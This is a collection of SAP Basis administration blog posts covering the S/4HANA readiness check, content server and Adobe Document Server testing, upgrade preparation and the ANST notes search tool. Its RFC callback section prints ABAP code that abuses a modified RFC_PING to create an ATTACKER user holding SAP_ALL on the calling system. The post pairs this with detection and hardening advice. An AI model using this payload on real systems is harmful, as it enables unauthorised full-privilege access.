S/4 HANA readiness check

SAP has released S4HANA readiness check 2.0. Please read this blog on the new tool version.

If you want to use the old version, please read on.

This blog explains the new tool for SAP customers to prepare for an S/4 HANA upgrade: the S/4 HANA readiness check.

Questions that will be answered are:

  • What is the S/4 HANA readiness check?
  • How to execute it?
  • What results can I expect?

S/4 HANA readiness check

The S/4 HANA readiness check is a tool from SAP that can help you prepare for an S/4 HANA upgrade. It is a web-based online tool running in the SAP cloud that uses 2 files with data from your system:

  1. Extract from your customer code
  2. Usage data of transactions measured in your system (based on ST03N data)

The outcome is an online report with a list of potential improvements in S/4 HANA that might be relevant for your business, and a list of potential issues when upgrading, caused by custom code or by generic changes by SAP.

The end user guide of the tool can be found on the SAP site.

Execution of S/4 HANA readiness check

The main note for the readiness check is 2290622. This note describes that there are 2 ways to run the check:

  1. Via solution manager
  2. Directly

The direct approach is the easiest. The exact steps are always updated in OSS note 2310438. Carefully implement all the prerequisite notes mentioned in this note.

After this is done 2 programs will be available.

Program SYCM_DOWNLOAD_REPOSITORY_INFO will download the ABAP custom developments.

Program SYCM_DOWNLOAD_REPOSITORY_INFO

The program will check if the where-used index is up to date. If not, it will refer to OSS note 2234970. This note can be a bit confusing, but basically what you need to do is run program SAPRSEUB in the background (and wait up to 2 days on a larger system with a lot of custom code!).

Please note the following: As a prerequisite for SAP Note 2185390 or the program SYCM_DOWNLOAD_REPOSITORY_INFO, please start only the program SAPRSEUB! Do not start SAPRSEUC. If you use an MSSQL database, you must implement SAP Note 1554667 before starting SAPRSEUB; otherwise, database problems occur. For more on the ABAP where-used index via SAPRSEUB, see blog link.

The second program will capture analysis data: TMW_RC_DOWNLOAD_ANALYSIS_DATA.

Program TMW_RC_DOWNLOAD_ANALYSIS_DATA

You will have to start this program a few times. Every time it will launch a new batch job for each tick box you have selected.

Both programs deliver a zip file that you store on your local PC or laptop.

You upload these result files in the SAP cloud part of the tool on the SAP support portal: https://launchpad.support.sap.com/#readiness.

Readiness tool import analysis

Now you have to wait until the analysis is done.

Result of the S/4 HANA readiness check tool

When the analysis is finished you first enter the dashboard:

Readiness tool result overview page

When zooming in you will reach the detailed screens with all the small details and relevant OSS note references:

Readiness tool details

Top right in the details list there is the button to create the results document. This is easier for sharing the results with management, since they typically don’t have an S user to logon to the tool.

Running S4HANA ABAP checks in your own system

With the remote ATC tool with special variant S4HANA Readiness you can run the ABAP checks in your own system. Read this blog for more information.

New content for new S4HANA versions

With every new version of S4HANA (and its intermediate feature packs) SAP will update the simplification list and the corresponding OSS notes. This will also impact the analysis programs. OSS note 2399707 – Simplification Item Check lists down which note version you need to apply to your system to have the checks for the S4HANA version of your choice. For the newer notes you will have to use the TCI based OSS notes (see blog on notes tips & tricks).

If you have installed the latest TCI note, you also get a new program called /SDF/RC_START_CHECK. After start of this program you get this screen:

Readiness check program

You now can immediately see if you have new versions of OSS notes to apply to get most recent checks.

And after the run, you can use the button Application Log to see a more detailed result list on the simplification checks carried out in your system.

Custom ABAP code analysis

For a more detailed analysis of your custom ABAP code you can use the remote ATC tooling. See this blog for details.

SAP content server technical tips and tricks

This blog will give you technical tips and tricks regarding the SAP content server.

Questions that will be answered are:

  • How can I check technical connection to content server?
  • How can I check that the content server functions work from technical side?
  • How can I test a cache server setup?
  • How can I extend to a file size limit above 2 GB?
  • How to check if a document exists in the content server?
  • How can I log document deletions?
  • How can I check and fix long response times?

Technical connection test to SAP content server

The first obvious connection test is in the administration function of the content server. Start transaction OAC0 (starts with letter O and ends with zero) and select your content server. On the next screen hit the check button. If the test is ok, click on the CSADMIN button and the detailed screen comes. There should be a green light behind your content repository. If no connection or no green light, there are issues in the linking and communication to content server (content server down, firewall block, etc). More details are in OSS note 2457912 – How to create a content repository in OAC0?.

CSADMIN only works properly with SAP content server. With external products there are restrictions. See OSS note 1879152 – CSADMIN: HTTP error: 400 Bad Request 5010: wrong usage.

Technical function test of SAP content server

To test if all the SAP content server functions are working from the technical level you can use test program RSCMST. Unfortunately there is no transaction linked by SAP, so you have to use SE38 or SA38 to start the program. After filling out the content server on first screen, you come to the second screen where you can launch the detailed tests. Per test you have to click the execute button.

Test program RSCMST result screen

Green means test has run and ok. Red is the unfortunate one where test has run and result is not ok. Yellow means test has not yet been executed.

In an ideal case all lights are green. If you have a red light, it is best to fix it by either applying an OSS note to the ABAP server or a patch to the content server.

Your specific company might not use all the technical options for content server (like the above HTTP using mCreate), but this is hard to correlate to end user scenarios. If your users are facing issues with content server and not all lights are green on this report, it is a basis issue to be solved.

More background on the tests: OSS note 1482012 – Check the connection to content server.

Remark: the test program RSCMST can have bugs by itself. So check for latest version of this program and apply the OSS notes before running and relying on the program. Last known updates are from July 2017, by looking at keyword RSCMST in the SAP notes.

If you are running on content server 7.53 or higher, please read OSS notes 2888195 – Content Server 7.53 and report RSCMST and 2897793 – RSCMSTH2 reports errors for Content Server 7.53. These notes state that only the first 3 checks are relevant for 7.53 and higher.

Bug fix notes:

Content server check in monitoring

By using a custom ABAP program, you can test the link from ABAP server to content server and alert to monitoring. Read this blog on how to achieve this and the source of the custom ABAP program.

Content server performance

Program RSHTTP80 can be used to test the content server performance. Background OSS note: 579366 – Content server performance.

Testing cache server setup

If you have a cache server setup and want to check if that works properly, also here test program RSCMST is used. Read OSS note 2083855 – How to check cache server access on the exact parameters to fill out.

File size limit larger than 2 GB

If you want to store files larger than 2 GB, follow the instructions from these OSS notes: 1705940 – Check in/out of files larger than 2GB in SAP Content Server and 2023376 – 2 GB Enablement from Knowledge Provider.

Migration of documents

You can migrate documents from the database to content server. Read this dedicated blog.

Timeout issues

For most timeout issues there is an issue with the content server. Check that the database and log files are not full. Reference: 2547719 – SAP Content Server: timeout error.

Long response times

In some cases attachments might have an unexpected long response time (despite small size of document). This can happen with GOS attachments and other (custom) code re-using the GOS attachments. Read OSS note 1783987 – Long response time for document display in Attachment list to set SU33 user parameters SAPHTTP_RFC_CHECK_TO and SAPCMS_RFC_CHECK_TO to value FAILED as solution. The note also explains the background.

Check document existence

To check if a document exists on the content server, follow the instructions from OSS note 2251113 – Check whether a document exists on SAP Content Server database.

Checking document deletion

If you want more information on document deletion, apply the settings from OSS note 2005308 – KPro Delete Logs to let the system log the knowledge provider document deletions in the SLG1 application log.

Signatures

Please be careful with the signature settings. This setting can be made in OAC0 for the repository and in CSADMIN for the content server, and the two have to be consistent. If they are not, you get unexpected issues where it does not work, and it is hard to detect that the imbalance in settings is causing the issue.

Content repository changes in the landscape

It is best NOT to transport content repository changes. Do the OAC0 maintenance locally. This is described in OSS note 3228661 – How to transport content repository configuration in OAC0. The same goes for deletion of OAC0 entries: do not transport, but delete locally in each system: 2939014 – How to delete a Content Repository using Transport Request?.

Using SAP database as content server

The settings to use the SAP database as content server are described in this OSS note: 3448453 – Configuring Content Repository of type ‘SAP Database’.

If possible don't use this option if you have a HANA database. All attachments and documents will be loaded into expensive memory and expensive license.

How to resolve the error “Tables COMPONENT and COMPONENT_DATA are inconsistent”?

In some very specific cases you will get the error “Tables COMPONENT and COMPONENT_DATA are inconsistent”. Solution for this issue might be to regenerate SAPHTTP and SAPHTTPA destinations with program RSHTTP05.

Reference OSS notes:

Adobe document server (ADS) technical tips and tricks

This blog will provide technical tips and tricks for Adobe Document Server (ADS) used from ABAP stack.

Questions that will be answered are:

  • How to retrieve ADS version information from ABAP stack?
  • How to test if the technical and functional connection from ABAP stack to ADS is working?
  • Where to find information on Adobe LifeCycle Designer?
  • Where to find more information on further issue analysis?

Reading the Adobe Document Server version from the ABAP stack

Run program FP_PDF_TEST_00 (unfortunately no transaction linked, so you need to run it from SE38 or SA38). Result is the ADS server version information.

ADS link test programs

There are two main test programs to run to check the connection from the ABAP stack to the Adobe Document Server.

First run program FP_PDF_TEST_00 (unfortunately no transaction linked, so you need to run it from SE38 or SA38). The output will be the version number of the Adobe Document server. If this check works, the connection from ABAP to ADS is working at network level and low basis level.

The second test program is called FP_CHECK_DESTINATION_SERVICE (unfortunately no transaction linked, so you need to run it from SE38 or SA38). The output is just number of bytes sent. If this check works, the connection from ABAP to ADS is working for functional forms connection as well.

In case of issues with FP_CHECK_DESTINATION_SERVICE, most likely the roles on the ADS JAVA side are not correct. Read the OSS note (with video) 2378564 – How to configure ADS_AGENT roles SAP_BC_FP_ICF and SAP_BC_FPADS_ICF [VIDEO] for the solution.

OSS notes:

Adobe LifeCycle designer

For developing the forms you need to install Adobe LifeCycle designer on your developer laptop or desktop. The most recent list of versions and patches is kept on dedicated SAP wiki page.

Further issue analysis on setup

Follow the steps in this SAP blog for further issue analysis. If this blog does not help, you can use the details from the very extensive OSS note “944221 – Error analysis for problems in form processing”.

Troubleshooting OSS notes:

Switching on standard SAP delivered ADS forms

SAP has delivered many ADS forms to replace existing SapScript and SmartForms. Unfortunately these are not turned on by default, not even on newly installed systems. To unlock all the standard SAP delivered ADS forms, go to SFW5 and activate the switch ERP_ALL_FORMS:

switch ERP_ALL_FORMS

After this is done, run report RERP_EHP_SHOW_FORM_LIST. For each form, this list gives you a pointer to what to change in customizing to point to the new ADS form.

SICF services

Adobe document server connection requires these 2 SICF services to be active:

  • /default_host/sap/bc/fp
  • /default_host/sap/bc/fpads

Check also these 2 OSS notes:

Adobe licenses

The general use to print output via ADS is included in the SAP license. If you want to use the advanced interactive form capability, this is subject to an extra license. See OSS note 750784 – SAP Interactive Forms: Licenses.

RFC callback hacking

This blog explains RFC callback hacking.

When you start transaction SM59 for setting up RFC connections, you might see the red icon telling you RFC callback check not secure.

RFC callback not secure

This blog will explain the following:

  • How can a hacker exploit this RFC callback weakness?
  • How to make the RFC callback secure?
  • What is the difference between RFC callback simulation and intervention?
  • What to do in case of a valid use of RFC callback?

RFC callback hacking in action

An RFC callback basically fires function modules back at the sender. These modules are then executed on the originating system with the privileges of the original caller.

If an attacker has gained access to one system and modifies code that is called from another system, the attacker can fire commands at the other system with the privileges of the caller.

In the example below the attacker has altered the standard RFC_PING function module (code snippet is below). The attacker then convinces a high-privilege admin of the target system to remotely call and ping the compromised system, for example by asking the admin to do a connection test in SM59 (which calls the RFC_PING module). The callback code is fired against the target system and runs with the user ID of the admin (not of the attacker) of the target system.

RFC callback hack explanation

Code snippet of modified RFC_PING:

  • Call module to create user on destination ‘BACK’ and set the password.
  • Assign the privilege SAP_ALL (highest available privilege)
 DATA: ZLV_BAPIBNAME TYPE SY-UNAME.
 DATA: ZLS_BAPILOGOND TYPE BAPILOGOND.
 DATA: ZLV_BAPIPWD TYPE XUNCODE.
 DATA: ZLS_BAPIADDR3 TYPE BAPIADDR3.
 DATA: ZLT_BAPIRET2 TYPE TABLE OF BAPIRET2.
 DATA: ZLS_BAPIPROF TYPE BAPIPROF.
 DATA: ZLT_BAPIPROF TYPE TABLE OF BAPIPROF.
 
   ZLV_BAPIBNAME = 'ATTACKER'.
   ZLS_BAPILOGOND-USTYP = 'A'.
   ZLV_BAPIPWD = 'Welcome_in1!'.
   ZLS_BAPIADDR3-LASTNAME = 'Attacker'.
 
   CALL FUNCTION 'BAPI_USER_CREATE1' DESTINATION 'BACK'
     EXPORTING
       USERNAME                      = ZLV_BAPIBNAME
       LOGONDATA                     = ZLS_BAPILOGOND
       PASSWORD                      = ZLV_BAPIPWD
       ADDRESS                       = ZLS_BAPIADDR3.
 
 ZLS_BAPIPROF-BAPIPROF = 'SAP_ALL'.
 APPEND ZLS_BAPIPROF TO ZLT_BAPIPROF.
 ZLS_BAPIPROF-BAPIPROF = 'SAP_NEW'.
 APPEND ZLS_BAPIPROF TO ZLT_BAPIPROF.
 
 CALL FUNCTION 'BAPI_USER_PROFILES_ASSIGN' DESTINATION 'BACK'
   EXPORTING
     USERNAME       = ZLV_BAPIBNAME
   TABLES
     PROFILES       = ZLT_BAPIPROF
     RETURN         = ZLT_BAPIRET2.

If the admin executes the ping towards the compromised system he will see this screen:

RFC ping

The only suspicious part the admin might see is the slightly longer logon time (in which the callback is executed).

End result on target system: ATTACKER user created by ADMIN user.

Attacker user created

With the privileges:

Attacker admin privileges assigned

This is one example. There are many different creative ways in which a callback RFC can be misused.

Detection of the RFC callbacks

RFC callback actions are registered in the SAP audit log if the audit log is configured to record them. The default classification for RFC callback events is warning.

Audit log trace for the above action looks as follows:

Audit log for user ADMIN
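
One way to turn the audit log into a detection for the scenario above, as an added example that is not from the original blog or from SAP: flag user creation or profile assignment recorded for the same user within a few seconds of an RFC callback. The export layout, the event names and the destination name ZCOMPROMISED are constructed assumptions.

```python
"""Flag user-administration actions that coincide with an RFC callback.

Added example. The record layout and event names are constructed; map them
to the message IDs used in your own audit log export.
"""
from datetime import datetime, timedelta

# Constructed sample export: timestamp|user|event|detail
SAMPLE_LOG = """\
2024-05-02 09:14:58|ADMIN|LOGON_OK|dialog logon
2024-05-02 09:15:01|ADMIN|RFC_CALLBACK|dest=ZCOMPROMISED called=RFC_PING callback=BAPI_USER_CREATE1
2024-05-02 09:15:01|ADMIN|USER_CREATED|user=ATTACKER
2024-05-02 09:15:02|ADMIN|RFC_CALLBACK|dest=ZCOMPROMISED called=RFC_PING callback=BAPI_USER_PROFILES_ASSIGN
2024-05-02 09:15:02|ADMIN|PROFILE_ASSIGNED|user=ATTACKER profile=SAP_ALL
2024-05-02 11:30:00|HELPDESK|USER_CREATED|user=JSMITH
2024-05-02 13:00:10|CUA_RFC|RFC_CALLBACK|dest=CHILD01 called=SUSR_ZBV_GET_REMOTE_PROFILES callback=SUSR_ZBV_SEND_PROFILES
"""

# Assumed names for the actions worth correlating with a callback.
SENSITIVE_EVENTS = {"USER_CREATED", "PROFILE_ASSIGNED"}


def parse_log(text):
    """Turn the pipe-delimited export into a list of record dicts."""
    records = []
    for line in text.splitlines():
        if not line.strip():
            continue
        stamp, user, event, detail = line.split("|", 3)
        # key=value pairs in the detail column; free text is ignored
        fields = dict(p.split("=", 1) for p in detail.split() if "=" in p)
        records.append({
            "time": datetime.strptime(stamp, "%Y-%m-%d %H:%M:%S"),
            "user": user,
            "event": event,
            "fields": fields,
        })
    return records


def find_callback_followups(records, window=timedelta(seconds=5)):
    """Return sensitive actions logged for a user close to an RFC callback.

    The callback runs with the caller's user ID, so the user creation shows
    up under the admin's name. The time window is checked in both directions
    because records written in the same second may be ordered either way.
    """
    callbacks = [r for r in records if r["event"] == "RFC_CALLBACK"]
    findings = []
    for rec in records:
        if rec["event"] not in SENSITIVE_EVENTS:
            continue
        near = [cb for cb in callbacks
                if cb["user"] == rec["user"]
                and abs(rec["time"] - cb["time"]) <= window]
        if not near:
            continue  # ordinary user administration, no callback nearby
        cb = min(near, key=lambda c: abs(rec["time"] - c["time"]))
        findings.append({
            "time": rec["time"],
            "user": rec["user"],
            "action": rec["event"],
            "target": rec["fields"].get("user"),
            "destination": cb["fields"].get("dest"),
            "called": cb["fields"].get("called"),
            "callback": cb["fields"].get("callback"),
        })
    return findings


if __name__ == "__main__":
    for f in find_callback_followups(parse_log(SAMPLE_LOG)):
        print(f"{f['time']} {f['user']}: {f['action']} {f['target']} during "
              f"callback {f['callback']} from {f['destination']} "
              f"(called {f['called']})")
```

The HELPDESK user creation in the sample is not flagged because no callback was recorded for that user at that time.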

How to make the RFC callback secure?

The SAP system parameter rfc/callback_security_method (set it in RZ11) determines the RFC callback behavior.

rfc/callback_security_method set to 1 basically means “do nothing”. This is the insecure default setting and it will result in the red traffic light on the SM59 RFC connection setup screen.

rfc/callback_security_method set to 2 means “simulation active”. With this setting entries are written to the audit log (for setup of the audit log see this blog). This setting is still insecure!

It can be used on a productive system to see which callbacks are coming in and do analysis before switching to 3 (fully secure, but immediate interception).

Make sure in the audit log, that the simulation is captured:

Simulate for a while, and then generate the white list (or positive list):

rfc/callback_security_method set to 3 means that the system will intercept RFC callback methods. This is the secure setting. The SM59 RFC connection traffic light will now show green:

RFC callback secure

Callback positive lists

In some cases an RFC callback is used with a good intention and reason. These exceptions can be put into the callback positive list. Per RFC destination, on the Logon & security tab, you can activate the combination of called and called back function modules.

If you have enabled the audit log, you can use it to generate RFC callback positive lists. In SM59 select the option: RFC / Generate RFC Callback Positive List.

Check to apply OSS note 2863851 – RFC Callback Positive Lists not created.

If you have spaces in the RFC, or by accident add a space as well, it can also give issues. Apply OSS note 2941068 – sm59/Callback whitelist input validation missing to fix this issue.

A callback can be seen as ST22 dump CALL_FUNCTION_BACK_REJECTED: see OSS note 2981184 – What to do in case of CALL_FUNCTION_BACK_REJECTED short dump.
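
The three parameter values and the positive list, modelled as an added example (not SAP code and not from the original blog): it shows that simulation mode still executes the callback, and that a positive list generated from observed callbacks should be reviewed before it is activated. The tuple layout, the destination names CHILD01 and ZCOMPROMISED and the review prefix are assumptions; value 1 is modelled the way the blog describes it.

```python
"""Model of rfc/callback_security_method 1/2/3 and positive-list generation.

Added example; a simplified model, not SAP's implementation.
"""
from collections import defaultdict

# Constructed simulation-phase observations:
# (RFC destination, called function module, called back function module)
OBSERVED = [
    ("CHILD01", "SUSR_ZBV_GET_REMOTE_PROFILES", "SUSR_ZBV_SEND_PROFILES"),
    ("CHILD01", "SUSR_ZBV_GET_REMOTE_PROFILES", "SUSR_ZBV_SEND_PROFILES"),
    ("EU_SCRP_WN32", "RS_SCRP_GF_PROCESS_640", "RS_SCRP_GF_RICONS"),
    ("ZCOMPROMISED", "RFC_PING", "BAPI_USER_CREATE1"),
    ("ZCOMPROMISED", "RFC_PING", "BAPI_USER_PROFILES_ASSIGN"),
]

# Assumption: callbacks into user administration are never accepted
# automatically; a person has to look at them first.
REVIEW_PREFIXES = ("BAPI_USER_",)


def propose_positive_lists(observed, review_prefixes=REVIEW_PREFIXES):
    """Build per-destination positive lists from observed callbacks.

    Returns (proposed, held): proposed maps destination to a sorted list of
    (called, callback) pairs; held lists the observations kept back for
    manual review. An empty review_prefixes tuple accepts everything, which
    is what blind generation from the log amounts to.
    """
    proposed = defaultdict(set)
    held = set()
    for dest, called, callback in observed:
        if callback.startswith(review_prefixes):
            held.add((dest, called, callback))
        else:
            proposed[dest].add((called, callback))
    return {d: sorted(p) for d, p in proposed.items()}, sorted(held)


def decide(method, positive_lists, dest, called, callback):
    """Return (executed, note) for one callback under the given setting."""
    listed = (called, callback) in positive_lists.get(dest, ())
    if method == 1:
        # "do nothing": the callback runs
        return (True, "no check")
    if method == 2:
        # simulation: the callback still runs, only the log shows the miss
        return (True, "listed" if listed else "simulated rejection logged")
    if method == 3:
        # interception: only listed combinations run
        return (True, "listed") if listed else (False, "rejected")
    raise ValueError(f"unsupported setting: {method}")


if __name__ == "__main__":
    proposed, held = propose_positive_lists(OBSERVED)
    print("proposed:", proposed)
    print("held for review:", held)
    for method in (1, 2, 3):
        print(method, decide(method, proposed,
                             "ZCOMPROMISED", "RFC_PING", "BAPI_USER_CREATE1"))
```

With the reviewed lists the modified RFC_PING callback is rejected under setting 3; with lists generated blindly from the same observations it would be accepted.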

OSS notes

Explanation notes:

Bug fix notes:

Known positive callback: SAP CUA

SAP CUA (central user administration) uses a callback to fetch profiles. In your CUA system, for each RFC destination to a remote child CUA system, you have to set the following positive callback:

CUA positive callback settings

(SUSR_ZBV_GET_REMOTE_PROFILES and SUSR_ZBV_SEND_PROFILES)

Known positive callback: SAP screen painter RFC EU_SCRP_WN32

In the screen painter RFC EU_SCRP_WN32 add the following list of modules (see OSS note 2251931 – Runtime error CALLBACK_REJECTED_BY_WHITELIST in graphical Screen Painter):

Called function module         Called back function module
RS_SCRP_GF_PROCESS_640         RFC_GET_FUNCTION_INTERFACE
RS_SCRP_GF_PROCESS_640         RS_SCRP_GF_RBUILDINFO
RS_SCRP_GF_PROCESS_640         RS_SCRP_GF_RELEMTABLE
RS_SCRP_GF_PROCESS_640         RS_SCRP_GF_RICONS
RS_SCRP_GF_PROCESS_640         RS_SCRP_GF_RKEYS
RS_SCRP_GF_PROCESS_640         RS_SCRP_GF_RKEYTEXTS
RS_SCRP_GF_PROCESS_640         RS_SCRP_GF_RMESSAGES
RS_SCRP_GF_PROCESS_640         RS_SCRP_GF_RPROPTABLE
RS_SCRP_GF_PROCESS_640         RS_SCRP_GF_RSTATUS_40
RS_SCRP_GF_PROCESS_640         RS_SCRP_GF_RTEXTS
RS_SCRP_GF_PROCESS_640         RS_SCRP_GF_RDDICFIELDS

The screen painter is hardly used at all nowadays. Normally developers use this tool only on development systems.

Known positive callback: remote ATC scenario

See OSS note 3084103 – Analyze reference check variants for RFC callbacks.

Known random callback issue: transport related callback calls

Some cases around transports are known, for example with system copies and refreshes. An RFC callback dump on module TRINT_PROGRESS_INDICATOR might occur on RFC destination BACK. In the dump you will find the real RFC (type TCP/IP) destination in variable LV_TP_DESTINATION. Regeneration is needed. Follow the instructions of OSS note 3356141 – CALLBACK_REJECTED_BY_WHITELIST when showing transport orders buffer.

Preparation for SAP upgrade or support package

This blog explains the preparation you can do for an SAP upgrade or support package.

Questions that will be answered are:

  • Where to find support package schedule?
  • Where to find version information on upgrades?
  • Do I need to do delta sizing for upgrade?
  • Do I need to perform extra preparation steps for an S4HANA upgrade?
  • Determining the version: why not to use the latest minus one?

Latest available main version for upgrade

For the latest available version you can check the SAP product availability matrix site. This is also known as the SAP-PAM.

After finding the right product on the first tab you can see the current release details and end of support date.

PAM details release and support dates

On the second tab you see the upgrade paths that are supported:

PAM details upgrade paths

In the middle the target version. On the left hand the versions from which you can upgrade. To the right are even higher versions you can upgrade to.

Also check the supported Linux versions here. You might be surprised: you often need to upgrade the operating system first before you can upgrade your application.

The same goes for the HANA database or database version: newer releases of functional software will force you to upgrade your database as well (or upgrade the database first).

Latest available versions of support packages

The latest available versions of support packages are published by SAP on the SAP support package stacks page. On this page click on the SAP support package stack maintenance schedule link to download the latest version of the schedule.

Support package version: minus one or latest?

In many companies there is a policy to never take the latest version of a support package. The line of thinking is: let other people solve the bugs of SAP first.

Current delivery of ABAP support packages is quite good, and the frequency is not as high as in the past. For ECC about 2 to 3 support packages per year are released (compared to 6 to 9 in the past in the 4.6 ages).

Instead of taking minus one, you can also consider this rule: at the point of go-live make sure that the support package was released at least 3 months ago. This will counter the risk of having an issue which has not been discovered by anyone else before.

People using the rule minus one without thinking should not be trusted. It is like going to Apple and insisting on iPhone 11, because you don't trust iPhone 12 and use the rule minus one...

Delta sizing

Delta sizing for support packages is not needed. Delta sizing for an upgrade might be required if:

  • Upgrade crosses multiple versions (for example upgrade from Netweaver 6.20 to Netweaver 7.51)
  • Upgrade is including a new database (for example migration to HANA database)
  • Specific upgrade manual is specific about delta sizing (for example the upgrade from SAP solution manager 7.1 to 7.2 is specific enough to carry out delta sizing)
  • For ECC to S4HANA conversion

Custom code

For analyzing custom code before the upgrade you can use the CDMC toolset. For more information read this blog.

Also use the clone finder to find clones. You might need to delete the clones or adjust them after the upgrade. More information on the clone finder tool can be read in this blog.

Releasing transports and cleaning up transport pipeline

For both support package and upgrade, releasing transports is a technical must. It is wise to start cleaning up the transport pipeline a few months beforehand (transports that are old and not released in the development system, transports that are imported into the quality environment but not imported in the productive system).

Check the clients

Check if you still have client 001 or 066. If yes, consider deletion. See dedicated blog.

BI queues

During the upgrade all BI queues must be empty. Check it upfront and/or delete them. For more information on BI queue deletion, read this dedicated blog.

Inactive code and data dictionary objects

Before upgrade or support pack can start all code and data dictionary objects must be activated or deleted.

In some rare cases there are inconsistencies in the data dictionary objects. Check table DWINACTIV in this case.

Side effect report for support packages

Per support package SAP keeps track of the unwanted side effects. OSS note 2388572 explains how to retrieve them for your support package. It is best to scan the side effects and apply the ones you think are needed.

For upgrades the side effects list is too large: here you simply need to test and fix any issues encountered.

New functions

After the upgrade you can start to use new functions. Some main functions are listed in the SAP help pages. The lesser-known small features are listed by SAP in the SAP improvements finder xls. This xls has 2 tabs: the first with the most recent improvements and the second with the long list of improvements since 2014. Per improvement you need to check the pre-conditions of release and support package, but if you upgraded to a recent version, most of the improvements will be installed. Some improvements are always active, some need extra activation steps. This is documented per improvement item.

New security parameters

After an upgrade (not support packs) new security parameters can be introduced to SAP. Prepare already which ones might impact you. For S4HANA upgrades and new security parameters read this dedicated blog.

S4HANA upgrade preparations

If you are upgrading your existing S4HANA system, read this dedicated blog on S4HANA upgrade preparations. And run the readiness check: read this blog.

S4HANA conversion preparations

An upgrade from ECC to S4HANA requires a different approach. In this upgrade also the simplification items and custom code migrations must be done. Read more in this dedicated blog.

For more S4HANA conversion preparations, read this blog.

Aftercare after upgrade

For aftercare after upgrade or support package read this blog.

ANST: automated notes search tool

This blog will explain one of the most useful new tools from SAP when having to find bugs in standard SAP coding. The ANST (automated notes search tool) is not receiving the recognition that it should get. In usability it is as easy as the SNOTE tool.

If you love SNOTE you will also love the ANST tool! Just try it out.

Questions that will be answered in this blog:

  • What is the ANST automated notes search tool?
  • How does it work?
  • Why should I always use this tool before submitting an incident to SAP?

ANST (automated notes search tool)

The ANST tool can help you in:

  • Quickly finding OSS notes for your issue
  • Check if your Z code is causing the issue or dump, or if it is a standard SAP issue

OSS note 1818192 is the ANST FAQ note which also has the minimum version. This note also has an extensive explanation. The how to use below is just a summary.

OSS note 2605555 also contains an excellent PDF inside as attachment, that gives a step by step manual.

How to use the ANST tool?

Start transaction code ANST.

ANST start screen

If you launch it for first time you might get an error "ANST001 Fatal Error. Customizing table is not filled". If this is the case follow the solution steps in OSS note 1909768.

In the transaction code box key in the transaction where you have the issue. As example we will use transaction code S_BCE_68001417 (search for authorizations by complex criteria). The user admin is complaining about an incorrect number of selected authorizations that are shown in that transaction.

So key in the transaction code and description (you can keep it same).

Now press execute: the transaction will be called. In the authorization object screen fill out S_DEVELOP and execute again to get the results:

Initial S_BCE_68001417

Now leave the transaction recording.

In the left bottom of the screen you can see the recording being written into the trace file:

Create trace file

Depending on the complexity and amount of screens you have passed this can take up to 1 to 10 minutes.

The result is shown after the trace file. The result is sorted per SAP module. If you open the details, you can also see the exact program blocks that were hit during the recording.

ANST trace result list per module and program block

Now you can select the modules (if wanted, specific code blocks) where you think the issue is. After selection hit the Note Search button. The SAP system will now connect to SAP service marketplace and look for the most recent notes for your version, which have not yet been implemented.

Note search result

The middle note seems to be very relevant. From this screen you can already link to the note (click on note number) and start the download to SNOTE.

Tips on the selection of the components:

  1. Never select more than 1000 components: ANST will reject this
  2. The fewer components you select, the faster you get results, and the shorter the list of potential notes as well
  3. If you want you can later retrieve the recording and make a different search on different components: no need to re-record
  4. Most of the time you can ignore the basis and cross application notes
  5. Run the recording and the result together with your functional consultant: he can help filter the components and select useful notes

Changing settings for maximum amount of notes

Especially in the basis or core ABAP area you will notice that ANST cannot read more than 1000 notes at once. This is a default setting you can easily change. In the main ANST screen hit the Settings button and scroll to the right to increase the maximum notes number:

Using ANST to analyze short dumps

The ANST tool can be used as well to analyze short dumps. Just start the ANST tool and run the steps including the step where the dump occurs. After the dump the ANST tool will trace the modules including the point where the dump occurs.

Make sure OSS note 2535278 is applied: this contains bug fix for the short dump case.

Checking for customer code issues

After the trace file is generated and you have searched for OSS notes, it can be there is still an issue caused by your own customer code. To exclude this (or to check it anyhow), you have to use the button Customer Code from the trace result screen with all the components. Be a bit patient while the tool is scanning for modifications, user-exits, BADI implementations and enhancement spots it came across in the recording.

If you want to analyze implicit and explicit enhancements as well with ANST you must apply OSS note 2408785 first.

ANST clickable demo

SAP has made a nice clickable demo to show you how it works: link to demo.

Use of ANST tool before submitting incident to SAP

Even if the ANST tool does not help you find the correct OSS note for your issue, it can help speed up the resolution of the incident by SAP.

If you want to report the issue to SAP as an incident download the ANST trace file. If you report the incident mention:

  • ANST tool is used and add the recording
  • Add list of already implemented OSS notes
  • You already checked for customer code

With this information the first line processor will have a quick job assigning the incident to the real issue solvers in Walldorf. This will save you valuable time, since the first line normally come with simple list of notes, or also run the ANST tool themselves, and then come with obvious notes.

Increasing the maximum number of objects limit

If you are using the ANST tool on a transaction with many objects (for example ME21N purchase order), you will notice that you cannot search for more than 1000 objects at the same time. You then have to open a subsection, select a subtree and run the search more than once with different selections. But sometimes one node really expands into more than 1000 objects. In this case, it is best to increase the maximum object limit. In the ANST start screen choose the Settings button and increase the Max.Object counter on the far right of the settings (scrolling required).

ANST max notes search settings

Needless to say, more objects do take more time to analyze. But it is worth the wait.

Relevant OSS notes

Some interesting OSS notes to review:

When analyzing very large transactions, you might face a CX_SY_CONVERSION_OVERFLOW dump. For a workaround read this OSS note: 2921867 – ANST: Dump “CONVT_OVERFLOW” “CX_SY_CONVERSION_OVERFLOW”.

Other errors and bug fix notes:

While switching to new SAP support backbone you might get a connection error. Follow the instructions from OSS note 2781045 – ANST / ST22 note search “Connection cannot be established” to solve it. Also apply OSS notes 2730525 – Consuming the Note Search Webservice and 2818143 – SEARCH_NOTES- Implementing SOAP Based Note Search.

And: 2829951 – Error while calling ANST Note Search WebService.

ANST for web applications and FIORI

ANST can also be used for web applications and FIORI. See this blog.

Retrieving actual detailed SAP component information

This blog explains how to retrieve actual detailed SAP component information.

Questions that will be answered:

  • How do I get detailed system component information?
  • How do I download these to compare them across the landscape?

System / Status

The simplest way of getting installation component information is by using the menu System/Status. Then click on the Status details button:

System status details

Now the installed software components and product versions will be shown:

In S4HANA systems, you might not get all the details, or you might get an authorization error. The information display in S4HANA requires extra authorizations for object S_SYS_INFO. The background is explained in OSS note 2658772 – System -> Status: Restriction of the available information.

Getting the details as download

The system status details cannot be downloaded. If you want to compare the software components in detail across your system landscape (sandbox, development, test, acceptance, productive, training, etc.), you need these details in a downloadable format. With the downloaded data it is easy to compare all details in Excel.

To get the details go to transaction SE37.

For the installed software use function module OCS_GET_INSTALLED_SWPRODUCTS. Execute it and click on the ET_SWPRODUCTS outcome table.

Installed products via OCS_GET_INSTALLED_SWPRODUCTS

For the details on all installation components and support pack status use function module OCS_GET_INSTALLED_COMPS. Execute it and click on the TT_COMPTAB:

Installed components via OCS_GET_INSTALLED_COMPS

